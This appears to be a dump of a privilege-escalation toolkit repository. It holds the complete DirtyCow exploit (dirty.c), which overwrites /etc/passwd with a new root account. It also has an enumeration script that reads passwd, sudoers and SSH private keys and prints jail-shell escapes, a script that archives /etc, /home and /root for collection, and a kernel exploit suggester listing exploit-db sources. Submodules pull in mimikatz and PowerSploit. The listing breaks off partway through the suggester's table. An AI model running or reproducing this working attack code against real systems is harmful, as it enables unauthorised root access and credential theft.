├── startftp.sh ├── dirty ├── starthttp.sh ├── rtcp4447.exe ├── EasySystem.exe ├── linux_gather_files.sh ├── .gitmodules ├── linux_privesc.sh ├── dirty.c ├── linux_kernel_exploiter.pl ├── linux_privesc.py ├── linux_checksec.sh ├── linux_enum.sh └── ADAPE.ps1 /startftp.sh: -------------------------------------------------------------------------------- 1 | python -m pyftpdlib -p 21 2 | -------------------------------------------------------------------------------- /dirty: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shiva108/escalationserver/HEAD/dirty -------------------------------------------------------------------------------- /starthttp.sh: -------------------------------------------------------------------------------- 1 | cd /home/e/httpserver/ 2 | python -m SimpleHTTPServer 8081 3 | -------------------------------------------------------------------------------- /rtcp4447.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shiva108/escalationserver/HEAD/rtcp4447.exe -------------------------------------------------------------------------------- /EasySystem.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shiva108/escalationserver/HEAD/EasySystem.exe -------------------------------------------------------------------------------- /linux_gather_files.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | tar -zcf linux_files.tar.gz /etc/* /home/* /root/* /var/www/* /var/log/* 4 | -------------------------------------------------------------------------------- /.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "AutoLocalPrivilegeEscalation"] 2 | path = AutoLocalPrivilegeEscalation 3 | url = ../../ngalongc/AutoLocalPrivilegeEscalation.git 4 | [submodule "BeRoot"] 5 | path = BeRoot 6 | url = ../../AlessandroZ/BeRoot.git 7 | [submodule "JAWS"] 8 | path = JAWS 9 | url = ../../411Hall/JAWS.git 10 | [submodule "kernelpop"] 11 | path = kernelpop 12 | url = ../../spencerdodd/kernelpop.git 13 | [submodule "linux-smart-enumeration"] 14 | path = linux-smart-enumeration 15 | url = ../../diego-treitos/linux-smart-enumeration.git 16 | [submodule "mimikatz"] 17 | path = mimikatz 18 | url = ../../gentilkiwi/mimikatz.git 19 | [submodule "Powerless"] 20 | path = Powerless 21 | url = ../../M4ximuss/Powerless.git 22 | [submodule "PowerLessShell"] 23 | path = PowerLessShell 24 | url = ../../Mr-Un1k0d3r/PowerLessShell.git 25 | [submodule "PowerSploit"] 26 | path = PowerSploit 27 | url = ../../PowerShellMafia/PowerSploit.git 28 | [submodule "PrivEsc"] 29 | path = PrivEsc 30 | url = ../../1N3/PrivEsc.git 31 | [submodule "Privesc"] 32 | path = Privesc 33 | url = ../../enjoiz/Privesc.git 34 | [submodule "pypykatz"] 35 | path = pypykatz 36 | url = ../../skelsec/pypykatz.git 37 | -------------------------------------------------------------------------------- /linux_privesc.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | echo "+ - --=[Linux Privilege Escalation Script by 1N3@CrowdShield - https://crowdshield.com" 3 | echo "" 4 | echo "Whats the distribution type? What version?" 5 | echo "#####################################################################" 6 | cat /etc/issue 7 | cat /etc/*-release 8 | echo "" 9 | echo "What's the Kernel version?" 10 | echo "#####################################################################" 11 | uname -a 12 | echo "" 13 | echo "What users are on the system?" 14 | cat /etc/passwd 15 | echo "" 16 | cat /etc/group 17 | echo "" 18 | echo "#####################################################################" 19 | echo "What services are running? Which service has which user" 20 | echo "#####################################################################" 21 | ps -auxxx | grep root 22 | echo "" 23 | echo "What applications are installed?" 24 | echo "#####################################################################" 25 | dpkg -l 26 | rpm -qa 27 | echo "" 28 | echo "#####################################################################" 29 | echo "Find configuration files for services..." 30 | find /etc/ -name *.conf 31 | echo "" 32 | echo "What jobs are scheduled?" 33 | echo "#####################################################################" 34 | crontab -l 35 | ls -alh /var/spool/cron 36 | ls -al /etc/cron* 37 | cat /etc/cron* 38 | echo "" 39 | echo "What NIC(s) does the system have?" 40 | echo "#####################################################################" 41 | echo "- Hostname" 42 | hostname 43 | echo "- Network Interfaces:" 44 | /sbin/ifconfig -a 45 | echo "- Routing info:" 46 | /sbin/route 47 | echo "- ARP Cache:" 48 | arp -a 49 | echo "- Current Network Connections:" 50 | netstat -antup 51 | echo "" 52 | echo "What sudo commands can be ran?" 53 | echo "#####################################################################" 54 | sudo -l 2> /dev/null 55 | echo "" 56 | cat /etc/sudoers 57 | echo "" 58 | echo "Anything interesting in the home directorie(s)? If its possible to access" 59 | echo "#####################################################################" 60 | echo " - /root/" 61 | ls -ahl /root/ 62 | echo "" 63 | echo " - /home/" 64 | ls -ahl /home/ 65 | echo "*** NOTE: Check for .bash_history files for clues, .ssh directories/keys and hidden directories/files for more clues..." 66 | echo "" 67 | echo "Can private-key information be found?" 68 | echo "#####################################################################" 69 | find /home/ -name authorized_keys 70 | echo "" 71 | find /home/ -name id_* 72 | echo "" 73 | find /root/ -name authorized_keys 74 | echo "" 75 | find /root/ -name id_* 76 | echo "" 77 | ls -lah /root/.ssh/ 78 | echo "" 79 | echo "Any settings/files (hidden) on website?" 80 | echo "#####################################################################" 81 | ls -alh /var/www/ 82 | echo "" 83 | echo "If commands are limited, you break out of the jail shell?" 84 | echo "#####################################################################" 85 | echo "python -c 'import pty;pty.spawn("/bin/bash")'" 86 | echo "echo os.system('/bin/bash')" 87 | echo "/bin/sh -i" 88 | echo "" 89 | echo "Are there any unmounted file-systems?" 90 | echo "#####################################################################" 91 | cat /etc/fstab 92 | echo "" 93 | echo "SUID OR GUID files..." 94 | echo "#####################################################################" 95 | find / -type f \( -perm -04000 -o -perm -02000 \) -exec ls -lh {} \; 2> /dev/null 96 | echo "" 97 | echo "What development tools/languages are installed/supported?" 98 | echo "#####################################################################" 99 | which perl 100 | which gcc 101 | which g++ 102 | which python 103 | which php 104 | which cc 105 | which go 106 | which node 107 | echo "" 108 | echo "How can files be uploaded?" 109 | echo "#####################################################################" 110 | which wget 111 | which nc 112 | which netcat 113 | which scp 114 | which ftp 115 | which tftp 116 | which curl 117 | echo "" 118 | echo "#####################################################################" 119 | echo "Done!" 120 | -------------------------------------------------------------------------------- /dirty.c: -------------------------------------------------------------------------------- 1 | // 2 | // This exploit uses the pokemon exploit of the dirtycow vulnerability 3 | // as a base and automatically generates a new passwd line. 4 | // The user will be prompted for the new password when the binary is run. 5 | // The original /etc/passwd file is then backed up to /tmp/passwd.bak 6 | // and overwrites the root account with the generated line. 7 | // After running the exploit you should be able to login with the newly 8 | // created user. 9 | // 10 | // To use this exploit modify the user values according to your needs. 11 | // The default is "firefart". 12 | // 13 | // Original exploit (dirtycow's ptrace_pokedata "pokemon" method): 14 | // https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c 15 | // 16 | // Compile with: 17 | // gcc -pthread dirty.c -o dirty -lcrypt 18 | // 19 | // Then run the newly create binary by either doing: 20 | // "./dirty" or "./dirty my-new-password" 21 | // 22 | // Afterwards, you can either "su firefart" or "ssh firefart@..." 23 | // 24 | // DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT! 25 | // mv /tmp/passwd.bak /etc/passwd 26 | // 27 | // Exploit adopted by Christian "FireFart" Mehlmauer 28 | // https://firefart.at 29 | // 30 | 31 | #include 32 | #include 33 | #include 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include 39 | #include 40 | #include 41 | #include 42 | #include 43 | #include 44 | 45 | const char *filename = "/etc/passwd"; 46 | const char *backup_filename = "/tmp/passwd.bak"; 47 | const char *salt = "firefart"; 48 | 49 | int f; 50 | void *map; 51 | pid_t pid; 52 | pthread_t pth; 53 | struct stat st; 54 | 55 | struct Userinfo { 56 | char *username; 57 | char *hash; 58 | int user_id; 59 | int group_id; 60 | char *info; 61 | char *home_dir; 62 | char *shell; 63 | }; 64 | 65 | char *generate_password_hash(char *plaintext_pw) { 66 | return crypt(plaintext_pw, salt); 67 | } 68 | 69 | char *generate_passwd_line(struct Userinfo u) { 70 | const char *format = "%s:%s:%d:%d:%s:%s:%s\n"; 71 | int size = snprintf(NULL, 0, format, u.username, u.hash, 72 | u.user_id, u.group_id, u.info, u.home_dir, u.shell); 73 | char *ret = malloc(size + 1); 74 | sprintf(ret, format, u.username, u.hash, u.user_id, 75 | u.group_id, u.info, u.home_dir, u.shell); 76 | return ret; 77 | } 78 | 79 | void *madviseThread(void *arg) { 80 | int i, c = 0; 81 | for(i = 0; i < 200000000; i++) { 82 | c += madvise(map, 100, MADV_DONTNEED); 83 | } 84 | printf("madvise %d\n\n", c); 85 | } 86 | 87 | int copy_file(const char *from, const char *to) { 88 | // check if target file already exists 89 | if(access(to, F_OK) != -1) { 90 | printf("File %s already exists! Please delete it and run again\n", 91 | to); 92 | return -1; 93 | } 94 | 95 | char ch; 96 | FILE *source, *target; 97 | 98 | source = fopen(from, "r"); 99 | if(source == NULL) { 100 | return -1; 101 | } 102 | target = fopen(to, "w"); 103 | if(target == NULL) { 104 | fclose(source); 105 | return -1; 106 | } 107 | 108 | while((ch = fgetc(source)) != EOF) { 109 | fputc(ch, target); 110 | } 111 | 112 | printf("%s successfully backed up to %s\n", 113 | from, to); 114 | 115 | fclose(source); 116 | fclose(target); 117 | 118 | return 0; 119 | } 120 | 121 | int main(int argc, char *argv[]) 122 | { 123 | // backup file 124 | int ret = copy_file(filename, backup_filename); 125 | if (ret != 0) { 126 | exit(ret); 127 | } 128 | 129 | struct Userinfo user; 130 | // set values, change as needed 131 | user.username = "firefart"; 132 | user.user_id = 0; 133 | user.group_id = 0; 134 | user.info = "pwned"; 135 | user.home_dir = "/root"; 136 | user.shell = "/bin/bash"; 137 | 138 | char *plaintext_pw; 139 | 140 | if (argc >= 2) { 141 | plaintext_pw = argv[1]; 142 | printf("Please enter the new password: %s\n", plaintext_pw); 143 | } else { 144 | plaintext_pw = getpass("Please enter the new password: "); 145 | } 146 | 147 | user.hash = generate_password_hash(plaintext_pw); 148 | char *complete_passwd_line = generate_passwd_line(user); 149 | printf("Complete line:\n%s\n", complete_passwd_line); 150 | 151 | f = open(filename, O_RDONLY); 152 | fstat(f, &st); 153 | map = mmap(NULL, 154 | st.st_size + sizeof(long), 155 | PROT_READ, 156 | MAP_PRIVATE, 157 | f, 158 | 0); 159 | printf("mmap: %lx\n",(unsigned long)map); 160 | pid = fork(); 161 | if(pid) { 162 | waitpid(pid, NULL, 0); 163 | int u, i, o, c = 0; 164 | int l=strlen(complete_passwd_line); 165 | for(i = 0; i < 10000/l; i++) { 166 | for(o = 0; o < l; o++) { 167 | for(u = 0; u < 10000; u++) { 168 | c += ptrace(PTRACE_POKETEXT, 169 | pid, 170 | map + o, 171 | *((long*)(complete_passwd_line + o))); 172 | } 173 | } 174 | } 175 | printf("ptrace %d\n",c); 176 | } 177 | else { 178 | pthread_create(&pth, 179 | NULL, 180 | madviseThread, 181 | NULL); 182 | ptrace(PTRACE_TRACEME); 183 | kill(getpid(), SIGSTOP); 184 | pthread_join(pth,NULL); 185 | } 186 | 187 | printf("Done! Check %s to see if the new user was created.\n", filename); 188 | printf("You can log in with the username '%s' and the password '%s'.\n\n", 189 | user.username, plaintext_pw); 190 | printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n", 191 | backup_filename, filename); 192 | return 0; 193 | } 194 | -------------------------------------------------------------------------------- /linux_kernel_exploiter.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | use strict; 3 | use warnings; 4 | use Getopt::Std; 5 | 6 | our $VERSION = '0.8'; 7 | 8 | my %opts; 9 | getopt( 'k,h', \%opts ); 10 | usage() if exists $opts{h}; 11 | 12 | my ( $khost, $is_partial ) = get_kernel(); 13 | print "\nKernel local: $khost\n\n"; 14 | 15 | my %exploits = get_exploits(); 16 | print 'Searching among ' . scalar keys(%exploits) . " exploits...\n\n"; 17 | print "Possible Exploits:\n"; 18 | 19 | EXPLOIT: 20 | foreach my $key ( sort keys %exploits ) { 21 | foreach my $kernel ( @{ $exploits{$key}{vuln} } ) { 22 | 23 | if ( $khost eq $kernel 24 | or ( $is_partial and index($kernel,$khost) == 0 ) 25 | ) { 26 | print "[+] $key"; 27 | print " ($kernel)" if $is_partial; 28 | 29 | my $alt = $exploits{$key}{alt}; 30 | my $cve = $exploits{$key}{cve}; 31 | my $mlw = $exploits{$key}{mil}; 32 | if ( $alt or $cve ) { 33 | print "\n"; 34 | } 35 | if ( $alt ) { print " Alt: $alt "; } 36 | if ( $cve ) { print " CVE-$cve"; } 37 | if ( $mlw ) { print "\n Source: $mlw"; } 38 | print "\n"; 39 | next EXPLOIT; 40 | } 41 | } 42 | } 43 | exit; 44 | 45 | 46 | ###################### 47 | ## extra functions ## 48 | ###################### 49 | 50 | sub get_kernel { 51 | my $khost = ''; 52 | 53 | if ( exists $opts{k} ) { 54 | $khost = $opts{k}; 55 | } 56 | else { 57 | $khost = `uname -r |cut -d"-" -f1`; 58 | chomp $khost; 59 | } 60 | 61 | # partial kernels might be provided by the user, 62 | # such as '2.4' or '2.6.' 63 | my $is_partial = $khost =~ /^\d+\.\d+\.\d/ ? 0 : 1; 64 | if ( $is_partial and substr($khost,-1) ne '.' ) { 65 | $khost .= '.'; 66 | } 67 | return ( $khost, $is_partial ); 68 | } 69 | 70 | sub usage { 71 | print <<"EOUSAGE"; 72 | Linux Exploit Suggester $VERSION 73 | Usage: \t$0 [-h] [-k kernel] 74 | 75 | [-h] help (this message) 76 | [-k] kernel number eg. 2.6.28 77 | 78 | You can also provide a partial kernel version (eg. 2.4) 79 | to see all exploits available. 80 | 81 | EOUSAGE 82 | } 83 | 84 | sub get_exploits { 85 | return ( 86 | 'w00t' => { 87 | vuln => [ 88 | '2.4.10', '2.4.16', '2.4.17', '2.4.18', 89 | '2.4.19', '2.4.20', '2.4.21', 90 | ] 91 | }, 92 | 'brk' => { 93 | vuln => [ '2.4.10', '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ], 94 | }, 95 | 'ave' => { vuln => [ '2.4.19', '2.4.20' ] }, 96 | 97 | 'elflbl' => { 98 | vuln => ['2.4.29'], 99 | mil => 'http://www.exploit-db.com/exploits/744/', 100 | }, 101 | 102 | 'elfdump' => { vuln => ['2.4.27'] }, 103 | 'elfcd' => { vuln => ['2.6.12'] }, 104 | 'expand_stack' => { vuln => ['2.4.29'] }, 105 | 106 | 'h00lyshit' => { 107 | vuln => [ 108 | '2.6.8', '2.6.10', '2.6.11', '2.6.12', 109 | '2.6.13', '2.6.14', '2.6.15', '2.6.16', 110 | ], 111 | cve => '2006-3626', 112 | mil => 'http://www.exploit-db.com/exploits/2013/', 113 | }, 114 | 115 | 'kdump' => { vuln => ['2.6.13'] }, 116 | 'km2' => { vuln => [ '2.4.18', '2.4.22' ] }, 117 | 'krad' => 118 | { vuln => [ '2.6.5', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11' ] }, 119 | 120 | 'krad3' => { 121 | vuln => [ '2.6.5', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11' ], 122 | mil => 'http://exploit-db.com/exploits/1397', 123 | }, 124 | 125 | 'local26' => { vuln => ['2.6.13'] }, 126 | 'loko' => { vuln => [ '2.4.22', '2.4.23', '2.4.24' ] }, 127 | 128 | 'mremap_pte' => { 129 | vuln => [ '2.4.20', '2.2.24', '2.4.25', '2.4.26', '2.4.27' ], 130 | mil => 'http://www.exploit-db.com/exploits/160/', 131 | }, 132 | 133 | 'newlocal' => { vuln => [ '2.4.17', '2.4.19' ] }, 134 | 'ong_bak' => { vuln => ['2.6.5'] }, 135 | 'ptrace' => 136 | { vuln => [ '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ] }, 137 | 'ptrace_kmod' => { 138 | vuln => [ '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ], 139 | cve => '2007-4573', 140 | }, 141 | 'ptrace_kmod2' => { 142 | vuln => [ 143 | '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31', 144 | '2.6.32', '2.6.33', '2.6.34', 145 | ], 146 | alt => 'ia32syscall,robert_you_suck', 147 | mil => 'http://www.exploit-db.com/exploits/15023/', 148 | cve => '2010-3301', 149 | }, 150 | 'ptrace24' => { vuln => ['2.4.9'] }, 151 | 'pwned' => { vuln => ['2.6.11'] }, 152 | 'py2' => { vuln => [ '2.6.9', '2.6.17', '2.6.15', '2.6.13' ] }, 153 | 'raptor_prctl' => { 154 | vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ], 155 | cve => '2006-2451', 156 | mil => 'http://www.exploit-db.com/exploits/2031/', 157 | }, 158 | 'prctl' => { 159 | vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ], 160 | mil => 'http://www.exploit-db.com/exploits/2004/', 161 | }, 162 | 'prctl2' => { 163 | vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ], 164 | mil => 'http://www.exploit-db.com/exploits/2005/', 165 | }, 166 | 'prctl3' => { 167 | vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ], 168 | mil => 'http://www.exploit-db.com/exploits/2006/', 169 | }, 170 | 'prctl4' => { 171 | vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ], 172 | mil => 'http://www.exploit-db.com/exploits/2011/', 173 | }, 174 | 'remap' => { vuln => ['2.4.'] }, 175 | 'rip' => { vuln => ['2.2.'] }, 176 | 'stackgrow2' => { vuln => [ '2.4.29', '2.6.10' ] }, 177 | 'uselib24' => { 178 | vuln => [ '2.6.10', '2.4.17', '2.4.22', '2.4.25', '2.4.27', '2.4.29' ] 179 | }, 180 | 'newsmp' => { vuln => ['2.6.'] }, 181 | 'smpracer' => { vuln => ['2.4.29'] }, 182 | 'loginx' => { vuln => ['2.4.22'] }, 183 | 'exp.sh' => { vuln => [ '2.6.9', '2.6.10', '2.6.16', '2.6.13' ] }, 184 | 'vmsplice1' => { 185 | vuln => [ 186 | '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', 187 | '2.6.23', '2.6.24', '2.6.24.1', 188 | ], 189 | alt => 'jessica biel', 190 | cve => '2008-0600', 191 | mil => 'http://www.exploit-db.com/exploits/5092', 192 | }, 193 | 'vmsplice2' => { 194 | vuln => [ '2.6.23', '2.6.24' ], 195 | alt => 'diane_lane', 196 | cve => '2008-0600', 197 | mil => 'http://www.exploit-db.com/exploits/5093', 198 | }, 199 | 'vconsole' => { 200 | vuln => ['2.6.'], 201 | cve => '2009-1046', 202 | }, 203 | 'sctp' => { 204 | vuln => ['2.6.26'], 205 | cve => '2008-4113', 206 | }, 207 | 'ftrex' => { 208 | vuln => [ 209 | '2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', 210 | '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', 211 | ], 212 | cve => '2008-4210', 213 | mil => 'http://www.exploit-db.com/exploits/6851', 214 | }, 215 | 'exit_notify' => { 216 | vuln => [ '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29' ], 217 | mil => 'http://www.exploit-db.com/exploits/8369', 218 | }, 219 | 'udev' => { 220 | vuln => [ '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29' ], 221 | alt => 'udev <1.4.1', 222 | cve => '2009-1185', 223 | mil => 'http://www.exploit-db.com/exploits/8478', 224 | }, 225 | 226 | 'sock_sendpage2' => { 227 | vuln => [ 228 | '2.4.4', '2.4.5', '2.4.6', '2.4.7', '2.4.8', '2.4.9', 229 | '2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15', 230 | '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21', 231 | '2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27', 232 | '2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33', 233 | '2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.0', '2.6.1', 234 | '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7', 235 | '2.6.8', '2.6.9', '2.6.10', '2.6.11', '2.6.12', '2.6.13', 236 | '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19', 237 | '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25', 238 | '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', 239 | ], 240 | alt => 'proto_ops', 241 | cve => '2009-2692', 242 | mil => 'http://www.exploit-db.com/exploits/9436', 243 | }, 244 | 245 | 'sock_sendpage' => { 246 | vuln => [ 247 | '2.4.4', '2.4.5', '2.4.6', '2.4.7', '2.4.8', '2.4.9', 248 | '2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15', 249 | '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21', 250 | '2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27', 251 | '2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33', 252 | '2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.0', '2.6.1', 253 | '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7', 254 | '2.6.8', '2.6.9', '2.6.10', '2.6.11', '2.6.12', '2.6.13', 255 | '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19', 256 | '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25', 257 | '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', 258 | ], 259 | alt => 'wunderbar_emporium', 260 | cve => '2009-2692', 261 | mil => 'http://www.exploit-db.com/exploits/9435', 262 | }, 263 | 'udp_sendmsg_32bit' => { 264 | vuln => [ 265 | '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', 266 | '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', '2.6.12', 267 | '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', 268 | '2.6.19', 269 | ], 270 | cve => '2009-2698', 271 | mil => 272 | 'http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c', 273 | }, 274 | 'pipe.c_32bit' => { 275 | vuln => [ 276 | '2.4.4', '2.4.5', '2.4.6', '2.4.7', '2.4.8', '2.4.9', 277 | '2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15', 278 | '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21', 279 | '2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27', 280 | '2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33', 281 | '2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.15', '2.6.16', 282 | '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', 283 | '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', 284 | '2.6.29', '2.6.30', '2.6.31', 285 | ], 286 | cve => '2009-3547', 287 | mil => 288 | 'http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c', 289 | }, 290 | 'do_pages_move' => { 291 | vuln => [ 292 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', 293 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', 294 | '2.6.30', '2.6.31', 295 | ], 296 | alt => 'sieve', 297 | cve => '2010-0415', 298 | mil => 'Spenders Enlightenment', 299 | }, 300 | 'reiserfs' => { 301 | vuln => [ 302 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', 303 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', 304 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', 305 | ], 306 | cve => '2010-1146', 307 | mil => 'http://www.exploit-db.com/exploits/12130/', 308 | }, 309 | 'can_bcm' => { 310 | vuln => [ 311 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', 312 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', 313 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', 314 | '2.6.36', 315 | ], 316 | cve => '2010-2959', 317 | mil => 'http://www.exploit-db.com/exploits/14814/', 318 | }, 319 | 'rds' => { 320 | vuln => [ 321 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', 322 | '2.6.34', '2.6.35', '2.6.36', 323 | ], 324 | mil => 'http://www.exploit-db.com/exploits/15285/', 325 | cve => '2010-3904', 326 | }, 327 | 'half_nelson' => { 328 | vuln => [ 329 | '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', 330 | '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', 331 | '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', 332 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', 333 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', 334 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', 335 | '2.6.36', 336 | ], 337 | alt => 'econet', 338 | cve => '2010-3848', 339 | mil => 'http://www.exploit-db.com/exploits/6851', 340 | }, 341 | 'half_nelson1' => { 342 | vuln => [ 343 | '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', 344 | '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', 345 | '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', 346 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', 347 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', 348 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', 349 | '2.6.36', 350 | ], 351 | alt => 'econet', 352 | cve => '2010-3848', 353 | mil => 'http://www.exploit-db.com/exploits/17787/', 354 | }, 355 | 'half_nelson2' => { 356 | vuln => [ 357 | '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', 358 | '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', 359 | '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', 360 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', 361 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', 362 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', 363 | '2.6.36', 364 | ], 365 | alt => 'econet', 366 | cve => '2010-3850', 367 | mil => 'http://www.exploit-db.com/exploits/17787/', 368 | }, 369 | 'half_nelson3' => { 370 | vuln => [ 371 | '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', 372 | '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', 373 | '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', 374 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', 375 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', 376 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', 377 | '2.6.36', 378 | ], 379 | alt => 'econet', 380 | cve => '2010-4073', 381 | mil => 'http://www.exploit-db.com/exploits/17787/', 382 | }, 383 | 'caps_to_root' => { 384 | vuln => [ '2.6.34', '2.6.35', '2.6.36' ], 385 | cve => 'n/a', 386 | mil => 'http://www.exploit-db.com/exploits/15916/', 387 | }, 388 | 'american-sign-language' => { 389 | vuln => [ 390 | '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', 391 | '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', 392 | '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', 393 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', 394 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', 395 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', 396 | '2.6.36', 397 | ], 398 | cve => '2010-4347', 399 | mil => 'http://www.securityfocus.com/bid/45408/', 400 | }, 401 | 'pktcdvd' => { 402 | vuln => [ 403 | '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', 404 | '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', 405 | '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', 406 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', 407 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', 408 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', 409 | '2.6.36', 410 | ], 411 | cve => '2010-3437', 412 | mil => 'http://www.exploit-db.com/exploits/15150/', 413 | }, 414 | 'video4linux' => { 415 | vuln => [ 416 | '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', 417 | '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', 418 | '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', 419 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', 420 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', 